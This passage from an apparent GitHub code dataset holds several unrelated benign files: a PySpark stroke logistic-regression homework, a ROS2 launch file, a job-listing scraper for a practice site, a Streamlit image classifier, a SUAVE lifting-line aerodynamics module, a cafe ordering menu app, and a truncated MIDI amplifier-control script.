self\n","repo_name":"Piiiiiii/SQLAlchemy-Flask-Swagger","sub_path":"app/libs/blueprint.py","file_name":"blueprint.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11674386331","text":"# Databricks notebook source\n# MAGIC %md # DSCI 617 –Homework 06\n# MAGIC ** Shahid Abdulaziz**\n\n# COMMAND ----------\n\nimport math\nimport pandas as pd\nimport numpy as np\nimport pyspark as py\nimport pyspark.sql.functions as F\nfrom pyspark.sql import SparkSession\nfrom pyspark.mllib.random import RandomRDDs\nfrom string import punctuation\nfrom operator import add\nfrom pyspark.sql.types import StructType, StructField, StringType, IntegerType, DoubleType, LongType\nimport matplotlib.pyplot as plt\nfrom pyspark.sql.functions import col, expr\nfrom pyspark.sql.functions import desc\nfrom pyspark.sql.functions import asc\nfrom pyspark.ml.feature import VectorAssembler, StringIndexer, OneHotEncoder\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator\nfrom pyspark.ml.tuning import CrossValidator, ParamGridBuilder\nfrom pyspark.ml.classification import LogisticRegression \nfrom pyspark.ml import Pipeline\nfrom pyspark.mllib.evaluation import MulticlassMetrics\n\n# COMMAND ----------\n\nspark = SparkSession.builder.getOrCreate()\nsc = 
spark.sparkContext\n\n# COMMAND ----------\n\n# MAGIC %md ## Problem 1: Load Stroke Data\n\n# COMMAND ----------\n\nstroke_schema = (\n 'gender STRING, age DOUBLE, hypertension INTEGER, heart_disease INTEGER, '\n 'ever_married STRING, work_type STRING, residence_type STRING, avg_glucose_level DOUBLE, ' \n ' bmi DOUBLE, smoking_status STRING, stroke INTEGER ')\n \n\nstroke_df = (\n spark.read\n .option('delimiter', ',')\n .option('header', True)\n .schema(stroke_schema )\n .csv('/FileStore/tables/stroke_data.csv')\n)\n\n\n \nstroke_df.printSchema()\n\n# COMMAND ----------\n\nstroke_df.show(10)\n\n# COMMAND ----------\n\nN = stroke_df.count()\nprint(N)\n\n# COMMAND ----------\n\n(stroke_df\n .select('*')\n .groupBy('stroke')\n .agg(\n F.round((F.count(col('stroke'))/N),4).alias('prop')\n )\n .show()\n\n\n)\n\n# COMMAND ----------\n\n# MAGIC %md ## Problem 2: Preprocessing\n\n# COMMAND ----------\n\n#https://maryville.instructure.com/courses/56731/files/10976108?wrap=1&fd_cookie_set=1\nnum_features = ['age','avg_glucose_level','bmi']\ncat_features = ['gender','hypertension','heart_disease','ever_married','work_type','residence_type','smoking_status']\n\n# COMMAND ----------\n\n#https://maryville.instructure.com/courses/56731/files/10976108?wrap=1&fd_cookie_set=1\nix_features = [c + '_ix' for c in cat_features]\nvec_features = [c + '_vec' for c in cat_features]\n\n\n\n# COMMAND ----------\n\n#https://maryville.instructure.com/courses/56731/files/10976108?wrap=1&fd_cookie_set=1\nlabel_indexer = StringIndexer(inputCol='stroke', outputCol='label').setHandleInvalid(\"keep\") \nfeature_indexer = StringIndexer(inputCols=cat_features, outputCols=ix_features)\n\n# COMMAND ----------\n\n#https://maryville.instructure.com/courses/56731/files/10976108?wrap=1&fd_cookie_set=1\nencoder = OneHotEncoder(inputCols=ix_features, outputCols=vec_features, dropLast= False)\n\n# COMMAND ----------\n\n#https://maryville.instructure.com/courses/56731/files/10976108?wrap=1&fd_cookie_set=1\nassembler = VectorAssembler(inputCols=num_features + vec_features, outputCol='features')\n\n\n# COMMAND ----------\n\n#https://maryville.instructure.com/courses/56731/files/10976108?wrap=1&fd_cookie_set=1\ntrainPipe = Pipeline(stages=[label_indexer,feature_indexer, encoder, assembler]).fit(stroke_df)\ntrain = trainPipe.transform(stroke_df)\n\ntrain.persist()\ntrain.select(['features', 'stroke']).show(10, truncate=False)\n\n\n# COMMAND ----------\n\n# MAGIC %md ## Problem 3: Hyperparameter Tuning for Logistic Regression\n\n# COMMAND ----------\n\n#Source:https://maryville.instructure.com/courses/56731/files/10976119?wrap=1&fd_cookie_set=1\naccuracy_eval = MulticlassClassificationEvaluator(\n predictionCol='prediction', labelCol='label', metricName='accuracy')\n\nlogreg = LogisticRegression(featuresCol='features', labelCol='label')\n\nparam_grid = (ParamGridBuilder()\n .addGrid(logreg.regParam, [ 0.0001, 0.001, 0.01, 0.1, 1])\n .addGrid(logreg.elasticNetParam, [0, 0.5,1])\n ).build()\ncv = CrossValidator(estimator=logreg, estimatorParamMaps=param_grid, evaluator=accuracy_eval, \n numFolds=5, seed=1, parallelism=8)\n\ncv_model = cv.fit(train)\n\n# COMMAND ----------\n\n#Source: https://maryville.instructure.com/courses/56731/files/10976108?wrap=1&fd_cookie_set=1\nmodel = cv_model.bestModel\nopt_regParam = model.getRegParam()\nopt_enetParam = model.getElasticNetParam()\n\nprint('Max CV Score: ', round(max(cv_model.avgMetrics),4))\nprint('Optimal Lambda:', opt_regParam)\nprint('Optimal Alpha: ', opt_enetParam)\n\n# COMMAND 
----------\n\nmodel_params = cv_model.getEstimatorParamMaps()\n\nlr_cv_summary_list = []\nfor param_set, acc in zip(model_params, cv_model.avgMetrics):\n new_set = list(param_set.values()) + [acc]\n lr_cv_summary_list.append(new_set)\nlr_cv_summary = pd.DataFrame( lr_cv_summary_list, columns=['reg_param', 'enet_param', 'acc'])\nfor en in lr_cv_summary.enet_param.unique():\n sel = lr_cv_summary.enet_param == en\n plt.plot( lr_cv_summary.reg_param[sel], lr_cv_summary.acc[sel], label=en)\n plt.scatter( lr_cv_summary.reg_param[sel], lr_cv_summary.acc[sel]) \nplt.legend()\nplt.xscale('log')\nplt.grid()\nplt.xlabel('Regularization Parameter')\nplt.ylabel('Cross-Validation Score')\nplt.show()\n \n\n# COMMAND ----------\n\n# MAGIC %md ## Problem 4: Training Predictions\n\n# COMMAND ----------\n\ntrain_pred = model.transform(train)\ntrain_pred.select('probability', 'prediction', 'label').show(10, truncate=False)\n\n# COMMAND ----------\n\ntrain_pred.select('probability', 'prediction', 'label').filter(expr('prediction <> stroke')).show(10, truncate=False)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC * The highest probability observed for an incorrect answer is 0.7327\n# MAGIC * The lowest probability observed for an incorrect answer is 0.3182 \n\n# COMMAND ----------\n\n# MAGIC %md ## Problem 5: Classification Metrics\n\n# COMMAND ----------\n\npred_and_labels = train_pred.rdd.map(lambda x:(x['prediction'],float(x['stroke'])))\n\n# COMMAND ----------\n\n#Source: https://maryville.instructure.com/courses/56731/files/10976095?wrap=1&fd_cookie_set=1\nmetrics = MulticlassMetrics(pred_and_labels)\nprint(metrics.accuracy)\n\n# COMMAND ----------\n\n#Source: https://maryville.instructure.com/courses/56731/files/10976095?wrap=1&fd_cookie_set=1\ncm = metrics.confusionMatrix().toArray().astype(int)\nlabels = trainPipe.stages[0].labels\n\n# COMMAND ----------\n\npd.DataFrame(\n data=cm, \n columns=labels,\n index=labels\n)\n \n\n# COMMAND ----------\n\n#source: https://maryville.instructure.com/courses/56731/files/10976108?wrap=1&fd_cookie_set=1\nprint('cut Precision Recall')\nprint('------------------------------')\nfor i, lab in enumerate(labels):\n print(f'{lab:<12}{metrics.precision(i):<12.4f}{metrics.recall(i):.4f}')\n\n# COMMAND ----------\n\n# MAGIC %md ## Problem 6: Applying the Model to New Data\n\n# COMMAND ----------\n\n\nnewData = [\n ['Female', 42.0 ,1 ,0 , 'No' ,'Private' ,'Urban' ,182.1 ,26.8 ,'smokes'],\n ['Female', 64.0 ,0 ,1 , 'Yes' ,'Self-employed','Urban' ,171.5 ,32.5 ,'formerly smoked'],\n ['Female', 37.0 ,0 ,0 , 'Yes' ,'Private' ,'Urban' ,79.2 ,18.4 ,'Unkown'],\n ['Female', 72.0 ,0 ,1 , 'No' ,'Private' ,'Govt_job',125.7 ,19.4 ,'never smoked'] \n]\nnewData_schema = (\n 'gender STRING, age DOUBLE, hypertension INTEGER, heart_disease INTEGER, '\n 'ever_married STRING, work_type STRING, residence_type STRING, avg_glucose_level DOUBLE, ' \n 'bmi DOUBLE, smoking_status STRING')\n\n\nnewData = spark.createDataFrame(data= newData, schema =newData_schema )\nnewData.show()\n\n\n\n# COMMAND ----------\n\nnewDataTrans = trainPipe.transform(newData)\nnewPred = model.transform(newDataTrans)\nnewPred.select('probability', 'prediction').show(truncate=False)\n\n# COMMAND ----------\n\n\n","repo_name":"ShahidAbdulaziz/Spark","sub_path":"LogisitcRegression.py","file_name":"LogisitcRegression.py","file_ext":"py","file_size_in_byte":7861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11836924262","text":"#!/usr/bin/env python3\n\n# Author: 
Bishop Pearson\n\nimport os\n\nfrom ament_index_python.packages import get_package_share_directory\nfrom launch import LaunchDescription\nfrom launch.actions import DeclareLaunchArgument\nfrom launch.actions import IncludeLaunchDescription\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\nfrom launch.substitutions import LaunchConfiguration\nfrom launch.substitutions import ThisLaunchFileDir\n\n\ndef generate_launch_description():\n omo_r1mini_mcu_parameter = LaunchConfiguration(\n 'omo_r1mini_mcu_parameter',\n default=os.path.join(\n get_package_share_directory('omo_r1mini_bringup'),\n 'param/omo_r1mini_mcu.yaml'\n )\n )\n\n omo_r1mini_lidar_parameter = LaunchConfiguration(\n 'omo_r1mini_lidar_parameter',\n default=os.path.join(\n get_package_share_directory('omo_r1mini_bringup'),\n 'param/omo_r1mini_lidar.yaml'\n )\n )\n\n use_sim_time = LaunchConfiguration('use_sim_time', default='false')\n\n omo_r1mini_description_dir = LaunchConfiguration(\n 'omo_r1mini_description_dir',\n default=os.path.join(\n get_package_share_directory('omo_r1mini_description'),\n 'launch'\n )\n )\n\n return LaunchDescription([\n DeclareLaunchArgument(\n 'omo_r1mini_mcu_parameter',\n default_value=omo_r1mini_mcu_parameter\n ),\n\n DeclareLaunchArgument(\n 'omo_r1mini_lidar_parameter',\n default_value=omo_r1mini_lidar_parameter\n ),\n\n IncludeLaunchDescription(\n PythonLaunchDescriptionSource([ThisLaunchFileDir(), '/omo_r1mini_mcu.launch.py']),\n launch_arguments={'omo_r1mini_mcu_parameter': omo_r1mini_mcu_parameter}.items()\n ),\n \n IncludeLaunchDescription(\n PythonLaunchDescriptionSource([ThisLaunchFileDir(), '/omo_r1mini_lidar.launch.py']),\n launch_arguments={'omo_r1mini_lidar_parameter': omo_r1mini_lidar_parameter}.items()\n ),\n \n IncludeLaunchDescription(\n PythonLaunchDescriptionSource([omo_r1mini_description_dir, '/omo_r1mini_state_publisher.launch.py']),\n launch_arguments={'use_sim_time': use_sim_time}.items(),\n ),\n ])\n","repo_name":"omorobot/omo_r1mini-foxy","sub_path":"omo_r1mini_bringup/launch/omo_r1mini_bringup.launch.py","file_name":"omo_r1mini_bringup.launch.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"20723992935","text":"#Jorge Angel Valdez Tristan 1957496\n#Import modules\nimport requests\nfrom bs4 import BeautifulSoup as bs\n\n#Get information from the URL\nurl = \"https://realpython.github.io/fake-jobs/\"\npage = requests.get(url)\n\n#Parse the HTML with BeautifulSoup\nsoup = bs(page.content, \"html.parser\")\nresults = soup.find(id=\"ResultsContainer\")\n\n#Find elements with class = card-content\njob_elements = results.find_all(\"div\", class_=\"card-content\")\n#Find elements containing the word python\npython_jobs = results.find_all(\n \"h2\", string=lambda text:\"python\" in text.lower()\n )\n#Find the elements from python_jobs and store them in a variable\n\npython_jobs_elements= [h2_element.parent.parent.parent for h2_element in python_jobs]\n#Find and display info for the Python-related jobs\nfor job_element in python_jobs_elements:\n title_element = job_element.find(\"h2\", class_=\"title\")\n company_element = job_element.find (\"h3\", class_=\"company\")\n location_element = job_element.find (\"p\", class_=\"location\")\n #Find anchor tags\n link_url= job_element.find_all(\"a\")[1][\"href\"]\n print (title_element.text.strip())\n print (company_element.text.strip())\n print(location_element.text.strip())\n #Format the print to include the link output\n print (f\"apply here: {link_url}\\n\")\n print()\n \n\n\n \n\n\n","repo_name":"Angeltrst03/Laboratorio-programacion-para-ciberseguridad","sub_path":"5 Websrcaping/scrap12.py","file_name":"scrap12.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5499289708","text":"from fastai.learner import load_learner\nfrom fastai.vision.core import PILImage\n\nimport streamlit as st\nfrom PIL import Image\n\ndef load_image(image):\n '''\n Pass BytesIO image\n Return PILImage object\n '''\n return Image.open(image)\n\ndef predict_img(img):\n '''\n Pass PILImage object\n Return prediction[str], prediction_idx[int], probability[tensor]\n '''\n if img is not None:\n return learner_inf.predict(img)\n\n'## Big Cats Classifier'\n\"Here's the [GitHub](https://github.com/dnaveenr/big_cat_classifier) repo\"\n'Upload a picture of a Big Cat and determine which category it belongs to.'\n\nlearner_inf = load_learner(\"./big_cat_classifier.pkl\")\n\n# Upload\npic = st.file_uploader(\"Upload Image File\")\n\n\nprobs = []\npred_idx = 1\npred = 'n/a'\n\n# Display image\nif pic is not None:\n img = load_image(pic)\n st.image(img, use_column_width=True)\n\n # Parse image\n pil_img = PILImage.create(pic)\n\n # Predict category\n pred, pred_idx, probs = predict_img(pil_img)\n\n'Click Classify'\n\n# Classify\nif st.button('Classify'):\n 'Predicted as ', pred\n 'Probability of ', str(round(probs[pred_idx].item(), 3) * 100), '%'\n\n\"Note : Probability greater than 90% indicates a confident guess whereas a lower probability indicates the model is not very sure of the guess. :)\"","repo_name":"dnaveenr/big_cat_classifier","sub_path":"src/streamlit_deploy.py","file_name":"streamlit_deploy.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38835918883","text":"## @ingroup Analyses-Aerodynamics\n# Lifting_Line.py\n# \n# Created: Aug 2017, E. Botero\n# Apr 2020, M. Clarke\n# Jun 2021, R. 
Erhard\n\n# ----------------------------------------------------------------------\n# Imports\n# ----------------------------------------------------------------------\n\nimport numpy as np\nfrom SUAVE.Core import Data, Units\nfrom SUAVE.Methods.Aerodynamics.Lifting_Line import lifting_line as LL\nfrom .Aerodynamics import Aerodynamics\n\n# ----------------------------------------------------------------------\n# Class\n# ----------------------------------------------------------------------\n## @ingroup Analyses-Aerodynamics\nclass Lifting_Line(Aerodynamics):\n \"\"\"This builds a surrogate and computes lift using a basic lifting line.\n\n Assumptions:\n None\n\n Source:\n None\n \"\"\" \n\n def __defaults__(self):\n \"\"\"This sets the default values and methods for the analysis.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n None\n\n Outputs:\n None\n\n Properties Used:\n N/A\n \"\"\" \n self.tag = 'Lifting_Line'\n\n self.geometry = Data()\n self.settings = Data()\n\n # correction factors\n self.settings.fuselage_lift_correction = 1.14\n self.settings.trim_drag_correction_factor = 1.02\n self.settings.wing_parasite_drag_form_factor = 1.1\n self.settings.fuselage_parasite_drag_form_factor = 2.3\n\n # vortex lattice configurations\n self.settings.number_of_stations = 100\n \n # conditions table, used for surrogate model training\n self.training = Data() \n self.training.angle_of_attack = np.array([-10.,-5.,0.,5.,10.]) * Units.deg\n self.training.lift_coefficient = None\n self.training.drag_coefficient = None\n \n # surrogoate models\n self.surrogates = Data()\n self.surrogates.lift_coefficient = None\n self.surrogates.drag_coefficient = None\n \n \n def initialize(self,use_surrogate,n_sw,n_cw ,propeller_wake_model,mf,mn ,dcs):\n \"\"\"Drives functions to get training samples and build a surrogate.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n None\n\n Outputs:\n None\n\n Properties Used:\n None\n \"\"\" \n settings = self.settings\n \n if n_sw is not None:\n settings.number_of_stations = n_sw\n \n # sample training data\n self.sample_training()\n \n # build surrogate\n self.build_surrogate()\n\n\n def evaluate(self,state,settings,geometry):\n \"\"\"Evaluates lift and drag using available surrogates.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n state.conditions.\n freestream.dynamics_pressure [-]\n angle_of_attack [radians]\n\n Outputs:\n conditions.aerodynamics.lift_breakdown.\n inviscid_wings[wings.*.tag] [-] CL (wing specific)\n inviscid_wings.total [-] CL\n conditions.aerodynamics.drag_breakdown.induced\n inviscid_wings[wings.*.tag] [-] CDi (wing specific)\n total [-] CDi\n inviscid [-] CDi\n\n conditions.aerodynamics.\n inviscid_wings_lift [-] CL\n\n Properties Used:\n self.surrogates.\n lift_coefficient [-] CL\n wing_lift_coefficient[wings.*.tag] [-] CL (wing specific)\n drag_coefficient [-] CDi\n wing_drag_coefficient[wings.*.tag] [-] CDi (wing specific)\n \"\"\" \n # unpack\n\n surrogates = self.surrogates \n conditions = state.conditions\n \n # unpack \n q = conditions.freestream.dynamic_pressure\n AoA = conditions.aerodynamics.angle_of_attack\n Sref = geometry.reference_area\n \n wings_lift_model = surrogates.lift_coefficient\n wings_drag_model = surrogates.drag_coefficient\n \n # inviscid lift of wings only\n inviscid_wings_lift = Data()\n inviscid_wings_drag = Data()\n inviscid_wings_lift.total = wings_lift_model(AoA)\n inviscid_wings_drag.total = wings_drag_model(AoA) \n conditions.aerodynamics.lift_breakdown.inviscid_wings = Data()\n 
conditions.aerodynamics.lift_breakdown.compressible_wings = Data()\n conditions.aerodynamics.drag_breakdown.induced = Data()\n conditions.aerodynamics.drag_breakdown.induced.inviscid_wings = Data()\n conditions.aerodynamics.lift_breakdown.inviscid_wings.total = inviscid_wings_lift.total\n conditions.aerodynamics.lift_coefficient = inviscid_wings_lift.total\n conditions.aerodynamics.drag_breakdown.induced.total = inviscid_wings_drag.total\n conditions.aerodynamics.drag_breakdown.induced.inviscid = inviscid_wings_drag.total\n conditions.aerodynamics.drag_coefficient = inviscid_wings_drag.total \n \n # store model for lift coefficients of each wing \n for wing in geometry.wings.keys():\n wings_lift_model = surrogates.wing_lift_coefficients[wing] \n wings_drag_model = surrogates.wing_drag_coefficients[wing]\n inviscid_wings_lift[wing] = wings_lift_model(AoA)\n inviscid_wings_drag[wing] = wings_drag_model(AoA)\n conditions.aerodynamics.lift_breakdown.inviscid_wings[wing] = inviscid_wings_lift[wing] \n conditions.aerodynamics.lift_breakdown.compressible_wings[wing] = inviscid_wings_lift[wing]\n conditions.aerodynamics.drag_breakdown.induced.inviscid_wings[wing] = inviscid_wings_drag[wing] \n\n return inviscid_wings_lift , inviscid_wings_drag\n\n\n def sample_training(self):\n \"\"\"Call methods to run vortex lattice for sample point evaluation.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n see properties used\n\n Outputs:\n self.training.\n lift_coefficient [-] \n wing_lift_coefficients [-] (wing specific)\n\n Properties Used:\n self.geometry.wings.*.tag\n self.settings (passed to calculate vortex lattice)\n self.training.angle_of_attack [radians]\n \"\"\" \n # unpack\n geometry = self.geometry\n settings = self.settings\n training = self.training\n \n AoA = training.angle_of_attack\n CL = np.zeros_like(AoA)\n CDi = np.zeros_like(AoA)\n \n wing_CLs = Data.fromkeys(geometry.wings.keys(), np.zeros_like(AoA))\n wing_CDis = Data.fromkeys(geometry.wings.keys(), np.zeros_like(AoA)) \n\n # condition input, local, do not keep\n konditions = Data()\n konditions.aerodynamics = Data()\n\n # calculate aerodynamics for table\n for i,_ in enumerate(AoA):\n \n # overriding conditions, thus the name mangling\n konditions.aerodynamics.angle_of_attack = AoA[i]\n \n # these functions are inherited from Aerodynamics() or overridden\n CL[i], wing_lifts , CDi[i], wing_drags = calculate_lift_lifting_line(konditions, settings, geometry)\n for wing in geometry.wings.values():\n wing_CLs[wing.tag][i] = wing_lifts[wing.tag]\n wing_CDis[wing.tag][i] = wing_drags[wing.tag]\n\n # store training data\n training.lift_coefficient = CL\n training.wing_lift_coefficients = wing_CLs\n training.drag_coefficient = CDi\n training.wing_drag_coefficients = wing_CDis \n\n return\n\n def build_surrogate(self):\n \"\"\"Build a surrogate using sample evaluation results.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n see properties used\n\n Outputs:\n self.surrogates.\n lift_coefficient \n wing_lift_coefficients (multiple surrogates)\n\n Properties Used:\n self.\n training.\n angle_of_attack [radians]\n lift_coefficient [-]\n wing_lift_coefficients [-] (wing specific)\n drag_coefficient [-]\n wing_drag_coefficients [-] (wing specific)\n \"\"\" \n # unpack data\n training = self.training\n AoA_data = training.angle_of_attack\n CL_data = training.lift_coefficient\n wing_CL_data = training.wing_lift_coefficients\n CDi_data = training.drag_coefficient\n wing_CDi_data = training.wing_drag_coefficients \n\n # pack for surrogate 
model\n X_data = np.array([AoA_data]).T\n X_data = np.reshape(X_data,-1)\n \n # learn the model\n cl_surrogate = np.poly1d(np.polyfit(X_data, CL_data ,1))\n cdi_surrogate = np.poly1d(np.polyfit(X_data, CDi_data ,2))\n \n wing_cl_surrogates = Data()\n wing_cdi_surrogates = Data()\n \n for wing in wing_CL_data.keys():\n wing_cl_surrogates[wing] = np.poly1d(np.polyfit(X_data, wing_CL_data[wing] ,1))\n wing_cdi_surrogates[wing] = np.poly1d(np.polyfit(X_data, wing_CDi_data[wing] ,2))\n\n self.surrogates.lift_coefficient = cl_surrogate\n self.surrogates.drag_coefficient = cdi_surrogate\n self.surrogates.wing_lift_coefficients = wing_cl_surrogates\n self.surrogates.wing_drag_coefficients = wing_cdi_surrogates\n\n return\n\n\n\n# ----------------------------------------------------------------------\n# Helper Functions\n# ----------------------------------------------------------------------\n\n\ndef calculate_lift_lifting_line(conditions,settings,geometry):\n \"\"\"Calculate the total vehicle lift coefficient and specific wing coefficients (with specific wing reference areas)\n using a lifting line method.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n conditions (passed to lifting line method)\n settings (passed to lifting line method)\n geometry.reference_area [m^2]\n geometry.wings.*.reference_area (each wing is also passed to the lifting line method)\n\n Outputs:\n \n\n Properties Used:\n \n \"\"\" \n\n # unpack\n vehicle_reference_area = geometry.reference_area\n\n # iterate over wings\n total_lift_coeff = 0.0\n total_drag_coeff = 0.0\n wing_lifts = Data()\n wing_drags = Data()\n for wing in geometry.wings.values():\n\n [wing_lift_coeff,wing_drag_coeff] = LL(conditions,settings,wing)\n total_lift_coeff += wing_lift_coeff * wing.areas.reference / vehicle_reference_area\n total_drag_coeff += wing_drag_coeff * wing.areas.reference / vehicle_reference_area\n wing_lifts[wing.tag] = wing_lift_coeff\n wing_drags[wing.tag] = wing_drag_coeff\n\n return total_lift_coeff, wing_lifts , total_drag_coeff , wing_drags\n","repo_name":"suavecode/SUAVE","sub_path":"trunk/SUAVE/Analyses/Aerodynamics/Lifting_Line.py","file_name":"Lifting_Line.py","file_ext":"py","file_size_in_byte":11713,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"61"} +{"seq_id":"73128716035","text":"import model\n\n\ndef navigate_main_menu():\n while True:\n print_main_menu_options()\n try:\n cmd = int(input(\"Enter input here -> \"))\n if cmd == 0:\n model.save_products_to_csv()\n model.save_couriers_to_csv()\n model.save_orders_to_csv()\n exit()\n elif cmd == 1:\n navigate_product_menu()\n elif cmd == 2:\n navigate_courier_menu()\n elif cmd == 3:\n navigate_order_menu()\n else:\n print(\"Error: Please input valid number.\")\n continue\n except ValueError:\n print(\"Please enter a number.\")\n break\n\n\ndef print_main_menu_options():\n print(\n (\n \"\"\"\nWelcome to Hamda's cafe app:\nMAIN MENU\nExit: 0\nProduct Menu: 1\nCourier Menu: 2\nOrder Menu: 3\n\"\"\"\n )\n )\n\n\ndef navigate_product_menu():\n while True:\n print_product_menu_options()\n try:\n cmd = int(input(\"Enter input here -> \")) \n if cmd == 0:\n navigate_main_menu()\n elif cmd == 1:\n model.print_products(model.product_list)\n continue\n elif cmd == 2:\n product_name = input(\"Enter new product name -> \")\n product_price = float(input(\"Enter new product price -> \"))\n model.add_product(model.product_list, product_name, product_price)\n continue\n elif cmd == 3:\n 
model.update_product(model.product_list)\n continue\n elif cmd == 4:\n model.delete_product(model.product_list)\n continue\n else:\n print(\"Error: please input valid number.\")\n continue\n except ValueError:\n print(\"Error: please enter a number\")\n continue\n\ndef print_product_menu_options():\n print(\n \"\"\"\nPRODUCT MENU\nExit to MAIN MENU: 0\nPrint products: 1\nAdd product: 2\nUpdate product: 3\nDelete product: 4\n\"\"\"\n )\n\n\ndef navigate_courier_menu():\n\n while True:\n print_courier_menu_options()\n try:\n cmd = int(input(\"Enter input here -> \"))\n if cmd == 0:\n # include save property\n navigate_main_menu()\n elif cmd == 1:\n model.print_couriers(model.courier_list)\n elif cmd == 2:\n courier_name = input(\"Please enter courier name -> \")\n courier_phone = input(\"Please enter courier phone number -> \")\n model.add_courier(model.courier_list, courier_name, courier_phone)\n elif cmd == 3:\n model.update_courier(model.courier_list)\n elif cmd == 4:\n model.delete_courier(model.courier_list)\n continue\n else:\n print(\"Error: please input valid number.\")\n continue\n except ValueError:\n print(\"Error: please enter a number\")\n continue\n\ndef print_courier_menu_options():\n print(\n \"\"\"\nCOURIER MENU\nExit to MAIN MENU: 0\nPrint couriers: 1\nAdd courier: 2\nUpdate courier: 3\nDelete courier: 4\n\"\"\"\n )\n\n\ndef navigate_order_menu():\n while True:\n print_order_menu_options()\n try:\n cmd = int(input(\"Enter input here -> \"))\n if cmd == 0:\n navigate_main_menu()\n elif cmd == 1:\n model.print_orders(model.order_list)\n continue\n elif cmd == 2:\n customer_name = input(\"Please enter customer name -> \")\n customer_address = input(\"Please enter customer address -> \")\n customer_phone_number = input(\"Please enter customer phone number -> \")\n model.add_order(\n model.order_list,\n customer_name,\n customer_address,\n customer_phone_number\n )\n continue\n elif cmd == 3:\n model.update_order(model.order_list)\n continue\n elif cmd == 4:\n model.delete_order(model.order_list)\n continue\n else:\n print(\"Error: please input valid number.\")\n continue\n except ValueError:\n print(\"Error: please enter a number\")\n continue\n\n\ndef print_order_menu_options():\n print(\n \"\"\"\n ORDER MENU\n Exit to MAIN MENU: 0\n Print orders: 1\n Add order: 2\n Update order: 3\n Delete order: 4\n \"\"\"\n )\n\n\nif __name__ == \"__main__\":\n model.load_products()\n model.load_couriers()\n model.load_orders()\n\n navigate_main_menu()\n","repo_name":"hamdamuse/delivery_app_project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31422504912","text":"\"\"\"\nMididings script translating from a couple of Actition MIDI controller\nfootpedals to control of a Katana MkII Head amplifier.\n\nMIDI out from the controllers should be routed into mididings input, and\nmididings output routed to the Katana.\n\"\"\"\nimport time\n\nfrom _thread import start_new_thread\n\nfrom mididings import *\nfrom mididings import engine\nfrom mididings import event\n\nconfig(\n backend='alsa',\n client_name='katana_proxy',\n data_offset=0,\n )\n\naddresses = {\n # effect colors\n \"60 00 06 39\": \"boost_color\",\n \"60 00 06 3a\": \"mod_color\",\n \"60 00 06 3b\": \"fx_color\",\n \"60 00 06 3c\": \"delay_color\",\n \"60 00 06 3d\": \"reverb_color\",\n \"00 00 00 2e\": \"global_eq_color\",\n\n # patch\n \"00 01 00 00\": \"patch_selected\",\n\n # 
effect / property toggles\n \"60 00 05 40\": \"reverb_on\",\n \"60 00 05 20\": \"delay2_on\",\n \"60 00 05 50\": \"pedal_fx_on\",\n \"60 00 06 14\": \"solo_on\",\n }\n\nPREFIX = \"f0 41 00 00 00 00 33\"\n\nsysex_cmds = {\n \"boost_color\": {\n 0: PREFIX + \" 12 60 00 06 39 00 61 f7\",\n 1: PREFIX + \" 12 60 00 06 39 01 60 f7\",\n 2: PREFIX + \" 12 60 00 06 39 02 5f f7\",\n },\n \"mod_color\": {\n 0: PREFIX + \" 12 60 00 06 3a 00 60 f7\",\n 1: PREFIX + \" 12 60 00 06 3a 01 5f f7\",\n 2: PREFIX + \" 12 60 00 06 3a 02 5e f7\",\n },\n \"fx_color\": {\n 0: PREFIX + \" 12 60 00 06 3b 00 5f f7\",\n 1: PREFIX + \" 12 60 00 06 3b 01 5e f7\",\n 2: PREFIX + \" 12 60 00 06 3b 02 5d f7\",\n },\n \"delay1_color\": {\n 0: PREFIX + \" 12 60 00 06 3c 00 5e f7\",\n 1: PREFIX + \" 12 60 00 06 3c 01 5d f7\",\n 2: PREFIX + \" 12 60 00 06 3c 02 5c f7\",\n },\n \"reverb_color\": {\n 0: PREFIX + \" 12 60 00 06 3d 00 5d f7\",\n 1: PREFIX + \" 12 60 00 06 3d 01 5c f7\",\n 2: PREFIX + \" 12 60 00 06 3d 02 5b f7\",\n },\n \"global_eq_color\": {\n 0: PREFIX + \" 12 00 00 00 2e 00 52 f7\",\n 1: PREFIX + \" 12 00 00 00 2e 01 51 f7\",\n 2: PREFIX + \" 12 00 00 00 2e 02 50 f7\",\n },\n\n # 127 -> on, 0 -> off\n \"reverb_on\": {\n 1: PREFIX + \" 12 60 00 05 40 01 5a f7\",\n 0: PREFIX + \" 12 60 00 05 40 00 5b f7\",\n },\n \"delay2_on\": {\n 1: PREFIX + \" 12 60 00 05 20 01 7a f7\",\n 0: PREFIX + \" 12 60 00 05 20 00 7b f7\",\n },\n \"pedal_fx_on\": {\n 1: PREFIX + \" 12 60 00 05 50 01 4a f7\",\n 0: PREFIX + \" 12 60 00 05 50 00 4b f7\",\n },\n \"preamp_solo_on\": {\n 1: PREFIX + \" 12 60 00 06 14 01 05 f7\",\n 0: PREFIX + \" 12 60 00 06 14 00 06 f7\",\n },\n \"select_amp\": PREFIX + \" 12 00 01 00 00 00 {} {} f7\",\n \"delay1_tap\": PREFIX + \" 12 60 00 05 02 {} {} {} f7\",\n \"delay2_tap\": PREFIX + \" 12 60 00 05 22 {} {} {} f7\",\n }\n\namp_state = {\n # effect colors: 0 == green, 1 == red, 2 == yellow\n 